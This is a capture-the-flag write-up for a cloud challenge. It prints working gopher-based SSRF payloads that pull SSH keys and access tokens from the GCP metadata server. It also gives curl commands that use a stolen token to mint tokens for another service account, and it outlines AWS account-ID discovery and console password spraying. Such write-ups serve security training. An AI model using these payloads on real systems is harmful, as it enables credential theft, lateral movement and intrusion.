Kabinet's GitBook
  • 🚩Kabinet CTF's Writeups
  • Page
  • 2025
    • Thuderdome
      • Emerge through the breach
      • Pulled from the sky
      • An absent defense
      • A new wave (web of deceit)
      • Crossing the great divide
      • Joining forces as one
      • Infiltrate (open the gate)
      • Jaeger
      • Victory
  • 2024
    • GreyCTF 2024
      • Markdown Parser
      • Fearless Concurrency
      • GreyCTF Survey
      • Baby Web
      • Beautiful Styles
      • All About Timing
      • Poly Playground
    • TetCTF 2024
      • Hello from API GW
      • Microservices
  • 2023
    • BSidesSF Cloud Village CTF
      • Tony Tony Tony
      • Plain Sight
      • A Suit of Armor Around The World
      • Sharing is Caring + Sequel
      • Photo Drive
    • DART CTF
      • Flag 1
      • Flag 2
      • Flag 3
      • Flag 4
      • Flag 5
      • Flag 6
      • Flag 7
      • Flag 8
      • Flag 9
      • Flag 10
    • EKS Cluster Games
    • Big IAM Challenge
  • 2022
    • Stack The Flag
      • Secret of Meow Olympurr
  • Authored
    • Cyber League 2025 Major 1
      • Perfect Storage
      • catalog commits
      • pawtainer hub
    • Lag and Crash 2023
      • Managed Secrets
      • Pickle Rick
      • Cloudy with a chance of meatball
    • NYP InfoSec December CTF 2022
      • Super Secure Technology Infrastructure
      • Self Introduction
      • Aww Cuter Cat
      • Obligatory Calc
      • BreadSecurity
  • NYP InfoSec Introduction to Pentesting Workshop
Powered by GitBook
On this page
  • Solve
  • TLDR
  • Reference

Was this helpful?

  1. 2025
  2. Thuderdome

Infiltrate (open the gate)

PreviousJoining forces as oneNextJaeger

Last updated 3 months ago

Was this helpful?

Solve

When clicking the refresh, we can see that the web app sends a POST request with a local url as feed. This is a very classical SSRF vulenrability that we see in cloud CTF.

We are also able to get local file read by changing the protocol to file://

From the source code, we can see that there is blacklisting along with sanitization involved, so we are not able to get RCE. When attempting to query the metadata instances, I receive an error message that we are missing the request header metadata flavour.

gopher://metadata.google.internal:80/xGET%20/computeMetadata/v1/instance/attributes/ssh-keys%20HTTP%2f%31%2e%31%0AHost:%20metadata.google.internal%0AAccept:%20%2a%2f%2a%0aMetadata-Flavor:%20Google%0d%0a

By copying the payload, we are able to list the SSH keys succesfully as a proof of concept.

Next, I enumerated the metadata and get the access token.

gopher%3A%2F%2Fmetadata%2Egoogle%2Einternal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fservice%2Daccounts%2Fdefault%2Ftoken%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata%2Egoogle%2Einternal%250AAccept%3A%2520%252a%252f%252a%250aMetadata%2DFlavor%3A%2520Google%250d%250a

From here i was stuck for quite a while, trying to use the access token to enumerate the mp-compute2 service account permission. It was until I dm an admin for hint that I was able to progress.

So apparantly GCP Brute does not run the Test IAM Permissions on a different service account, and we have to manually enumerate via APIs.

  curl -X POST \
    -H "Authorization: Bearer $at" \
    -H "Content-Type: application/json" \
    --data '{
      "permissions": ["iam.serviceAccounts.getAccessToken"]
    }' \
    "https://iam.googleapis.com/v1/projects/-/serviceAccounts/cloud-source@mp-proj-1-413623.iam.gserviceaccount.com:testIamPermissions"
  

The cloud source service account is from the enumeration we performed earlier.

Since the mp-compute2 is able to get access token for cloud-source, lets get the access token and enumerate cloud-source service account permission.

curl -X POST \
  -H "Authorization: Bearer $at" \
  -H "Content-Type: application/json" \
  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/cloud-source@mp-proj-1-413623.iam.gserviceaccount.com:generateAccessToken" \
  -d '{
    "scope": [
      "https://www.googleapis.com/auth/cloud-platform"
    ],
    "lifetime": "3600s"
  }'

With the new access token, lets enumerate the service account permission.

From the output, we can see that the service account has permission over cloud source repository. Cloud source repository is basically Google cloud version of GitHub.

So lets enumerate the cloud source.

Enumerating cloud source repos.

Cloning the repo.

Looking at the code of cloned repo, it seems to just be a static HTML code. The only interesting part is that theres a public s3 bucket.

However, while enumerating the public bucket, all the files are standard libraries without anything interesting.

I will not be elaborating on the process of setting up the IAM user and policy, you can refer to the lab that was linked, or find similar article wihtin the reference.

Here, I used s3-account-search to enumerate the Account ID, then used a curl request with the x-amz-expected-bucket-ownerto verify.

s3-account-search arn:aws:iam::[MY AWS ACCOUNT ID]:role/s3_attacker_role  it-storage-3562577

curl -X GET "https://it-storage-3562577.s3.amazonaws.com" \
-H "x-amz-expected-bucket-owner: 975050229156"

If the Account ID is wrong, we will get an access denied instead.

Next, Ill be spraying with GOAWSConsoleSpray again, with the username and password wordlist we saved previously. I managed to find a credential for haru with a reused password.

Lets enumerate recently visited service to see if theres anything interesting.

Looking at lambda, it looks like we have access over the function haru_test

Looking at the code source, we are able to retrieve the flag.

TLDR

  • Utilize parthaban credentials on the web application to authenticate

  • Attack the web app with SSRF, using the gopher protocol to append the Metadata-Flavourheader

  • Use testIamPermission on getAccessTokenagainst other service account to perform lateral movement

  • Lateral movement to cloud-source service account

  • Enumerate Google Cloud Source and download the Repository

  • Utilize s3-account-search to retrieve AWS Account ID

  • Utilize GoAWSConsoleSpray to spray AWS Console with the newly retrieved Account ID

  • Retrieve the flag from AWS Lambda

Reference

However while doing research, I came accross this technique on , which uses the gopher protocol to embed a request header.

Thats when I recall a that I had done before, which is to extract the Account ID from a S3 bucket and do further enumeration with the Account ID.

payloadallthething
lab
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#cloud-ssrf
https://cloud.google.com/compute/docs/metadata/querying-metadata
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/SSRF-Cloud-Instances.md#ssrf-url-for-google-cloud
https://cloud.google.com/source-repositories/docs/
https://pwnedlabs.io/labs/identify-the-aws-account-id-from-a-public-s3-bucket
https://hackingthe.cloud/aws/enumeration/account_id_from_s3_bucket/
listing the ssh key
getting access token
checking if mp-compute2 has permissions over cloud-source
getting the access token
Bruteforcing permissions
Setting environment variable to use gcloud cli with the access token
gcloud source repos list
gcloud source repos clone wholesale-distribution